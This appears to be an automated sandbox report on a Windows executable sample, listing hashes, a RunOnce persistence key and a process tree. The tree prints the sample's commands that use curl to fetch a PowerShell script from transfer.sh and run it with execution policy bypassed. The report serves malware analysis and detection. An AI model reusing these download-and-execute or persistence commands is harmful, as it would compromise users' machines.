Analysis
Max time kernel: 50s
Max time network: 47s
Platform: windows7_x64
Resource: win7-20220812-en
Resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
Submitted: 17/01/2023, 12:09
Static task: static1
Behavioral task: behavioral1
  Sample: 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe
  Resource: win10v2004-20220901-en
General
Target: 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe
Size: 547KB
MD5: b0ab211e83a23d58e1322e4d2d6f0a96
SHA1: d568fbcd41e30651cc80ba8a5e9eeab637a99f9e
SHA256: 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5
SHA512: 4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d
SSDEEP: 3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg
Malware Config
Signatures

Adds Run key to start application (2 TTPs, 2 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe
  Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid | Process
  1480 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 1480 | powershell.exe

Suspicious use of WriteProcessMemory (21 IoCs)
  Each parent/child pair below was logged 3 times (7 pairs, 21 IoCs in total).
  description | pid | Process | procid_target | events
  PID 1664 wrote to memory of 1628 | 1664 | 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe | 27 | 3
  PID 1628 wrote to memory of 1824 | 1628 | cmd.exe | 29 | 3
  PID 1824 wrote to memory of 932 | 1824 | WScript.exe | 30 | 3
  PID 932 wrote to memory of 376 | 932 | cmd.exe | 32 | 3
  PID 1824 wrote to memory of 552 | 1824 | WScript.exe | 33 | 3
  PID 552 wrote to memory of 548 | 552 | cmd.exe | 35 | 3
  PID 548 wrote to memory of 1480 | 548 | cmd.exe | 36 | 3
Processes (indented by process-tree depth)

C:\Users\Admin\AppData\Local\Temp\3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe"
  PID: 1664
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe
    Command line: cmd /c new.vbs
    PID: 1628
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"
      PID: 1824
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
        PID: 932
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\cmd.exe
          Command line: cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
          PID: 376

      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
        PID: 552
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\cmd.exe
          Command line: cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
          PID: 548
          - Suspicious use of WriteProcessMemory

          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            PID: 1480
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 300.0MB
MD5: f7e7099eea0cc25fc49d04cd53c573a1
SHA1: 3abac9f3f93b0f87ef432d70c40e8ab865157770
SHA256: b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be
SHA512: c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074